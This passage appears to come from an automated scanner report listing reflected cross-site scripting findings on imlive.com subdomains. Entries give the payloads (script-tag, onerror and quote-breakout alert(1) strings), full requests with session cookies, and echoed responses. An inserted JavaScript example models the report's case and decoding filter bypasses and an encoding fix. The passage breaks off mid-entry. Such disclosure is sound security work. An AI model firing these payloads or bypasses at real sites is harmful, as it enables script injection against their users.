<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.36. http://es.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd0ed"><script>alert(1)</script>3940b74ef04 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:29 GMT
Connection: close
Content-Length: 23570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.37. http://es.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25492'onerror%3d'alert(1)'4929c58198 was submitted in the gotopage parameter. This input was echoed as 25492'onerror='alert(1)'4929c58198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/25492'onerror%3d'alert(1)'4929c58198 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSRTQCRC=GFLJMIMAIHNDHDFGKCOMPNDP; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:17 GMT
Connection: close
Content-Length: 8313
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=es.imlive.com&ul=/webcam-login/25492'onerror='alert(1)'4929c58198/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://es.imlive.com:80/webcam-login/25492'onerror='alert(1)'4929c58198/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.38. http://es.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb36"><script>alert(1)</script>678c2c2a5a9 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:17 GMT
Connection: close
Content-Length: 23570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.39. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b566'-alert(1)-'c7449b1e1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?4b566'-alert(1)-'c7449b1e1ba=1 HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=r3zdvd55v5kn0b55yjmnpi55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=r3zdvd55v5kn0b55yjmnpi55; path=/; HttpOnly
Set-Cookie: spvdr=vd=a1d85813-857c-4f7f-9b93-2ebdcfdaba8e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:19 GMT
Connection: close
Content-Length: 19336
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=fr.imlive.com&ul=/?4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&iy=dallas&id=44&iu=1&vd=a1d85813-857c-4f7f-9b93-2ebdcfdaba8e';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.40. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed in the application's response with the tag name lowercased (see the reflection point in the response below); since HTML tag names are case-insensitive, the injected script element is still parsed and executed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
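Added example, not code from the report or from the imlive.com application: a model of the two filter bypasses described in 2.31 (a blacklist that runs before the application performs a second URL-decode) and 2.40 (a case-sensitive match on "script"), next to a render path that decodes the value once and entity-encodes it for the attribute context. The function names, the filter rule, the hostnames and the HTML fragments are assumptions for illustration; the two payloads are the report's own. The double-quoted context is modelled as a plain attribute; the onclick handler at the report's reflection points is a JavaScript string nested inside an attribute, which additionally needs JavaScript-string encoding applied before the attribute encoding.

```javascript
// Added example (not from the report or from imlive.com). Models the filter
// bypasses in sections 2.31 and 2.40 and the output encoding that fixes them.
// Function names, the blacklist rule and the HTML fragments are assumptions.

// Constructed stand-ins for the two payloads as they reach the application
// after the web server's single URL-decode: %2527 has become %27, and the
// mixed-case tag is untouched.
const ONCE_DECODED = "2babb%27style%3d%27x%3aexpression%28alert%281%29%29%27730ccb26132";
const MIXED_CASE = '2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647';

// A blacklist of the kind the scanner inferred: a literal single quote or a
// lowercase "<script" is rejected, nothing else is.
const BLACKLIST = /<script|'/;

function passesBlacklist(value) {
  return !BLACKLIST.test(value);
}

// Vulnerable pipeline: check the raw value, decode it AGAIN afterwards, and
// echo the result into an attribute without encoding. Returns null when the
// filter blocks the request. "single" models the img src in 2.31, "double"
// models the double-quoted attribute in 2.40.
function vulnerableRender(value, context) {
  if (!passesBlacklist(value)) return null;
  const v = decodeURIComponent(value); // second decode happens after the check
  return context === "single"
    ? `<img name='an' src='http://analytic.example/w.gif?ul=${v}/' height='1' width='1'>`
    : `<input type="hidden" name="ref" value="${v}">`;
}

// Fix: no second decode, and every character that can end an attribute value
// (in either quote style) or open a tag is entity-encoded at the output point.
function htmlAttrEncode(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function safeRender(value, context) {
  const v = htmlAttrEncode(value); // the value was already decoded once by the server
  return context === "single"
    ? `<img name='an' src='http://analytic.example/w.gif?ul=${v}/' height='1' width='1'>`
    : `<input type="hidden" name="ref" value="${v}">`;
}
```

The blacklist does its job against the obvious payload and nothing else: the once-decoded value carries no quote character when it is checked, and the mixed-case tag never matches the lowercase pattern. The fixed path does not need the blacklist at all; entity-encoding at the output point makes the quote and angle-bracket characters inert regardless of how they were spelled in the request.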

Request

GET /?2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647=1 HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ilg0g1555xawgsnqnx3jtzbh; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ilg0g1555xawgsnqnx3jtzbh; path=/; HttpOnly
Set-Cookie: spvdr=vd=a1a5e720-2007-4ea7-a708-9070c86d04f1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:18 GMT
Connection: close
Content-Length: 19737
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||2a9d8"><script>alert(1)</script>bf56a35d647~1');return false;">
...[SNIP]...

2.41. http://fr.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17fa1'onerror%3d'alert(1)'4373c72317b was submitted in the gotopage parameter. This input was echoed as 17fa1'onerror='alert(1)'4373c72317b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/17fa1'onerror%3d'alert(1)'4373c72317b HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:22 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQRCSC=BMMFJIMAJCKNADIOHDLHHPAA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 8315
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=fr.imlive.com&ul=/webcam-login/17fa1'onerror='alert(1)'4373c72317b/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://fr.imlive.com:80/webcam-login/17fa1'onerror='alert(1)'4373c72317b/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.42. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ff7"><script>alert(1)</script>e0815795bf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?84ff7"><script>alert(1)</script>e0815795bf3=1 HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rw3vjgrgjrpidqai44mlul2g; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rw3vjgrgjrpidqai44mlul2g; path=/; HttpOnly
Set-Cookie: spvdr=vd=b549c441-750e-4a3f-9af7-09b50e1c51fb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:22 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 21675
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||84ff7"><script>alert(1)</script>e0815795bf3~1');return false;">
...[SNIP]...

2.43. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity: High
Confidence: Certain
Host: http://gr.imlive.com
Path: /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b12e'-alert(1)-'11d097f86af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2b12e'-alert(1)-'11d097f86af=1 HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=c4sah4vvtrpptgagzrlohq45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=c4sah4vvtrpptgagzrlohq45; path=/; HttpOnly
Set-Cookie: spvdr=vd=47dec44d-298a-4e64-82a7-f991aeebff7d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:22 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:21 GMT
Connection: close
Content-Length: 21274
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=gr.imlive.com&ul=/?2b12e'-alert(1)-'11d097f86af=1&qs=2b12e'-alert(1)-'11d097f86af=1&qs=2b12e'-alert(1)-'11d097f86af=1&iy=dallas&id=44&iu=1&vd=47dec44d-298a-4e64-82a7-f991aeebff7d';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.44. http://gr.imlive.com/waccess/ [cbname parameter]

Summary

Severity: High
Confidence: Certain
Host: http://gr.imlive.com
Path: /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81248"><script>alert(1)</script>dd3960e35d8 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:31 GMT
Connection: close
Content-Length: 24865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.45. http://gr.imlive.com/waccess/ [from parameter]

Summary

Severity: High
Confidence: Certain
Host: http://gr.imlive.com
Path: /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855e3"><script>alert(1)</script>7145c8255ab was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:35 GMT
Connection: close
Content-Length: 24865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.46. http://gr.imlive.com/waccess/ [gotopage parameter]

Summary

Severity: High
Confidence: Certain
Host: http://gr.imlive.com
Path: /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d7c5'onerror%3d'alert(1)'1cb395fc54c was submitted in the gotopage parameter. This input was echoed as 2d7c5'onerror='alert(1)'1cb395fc54c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

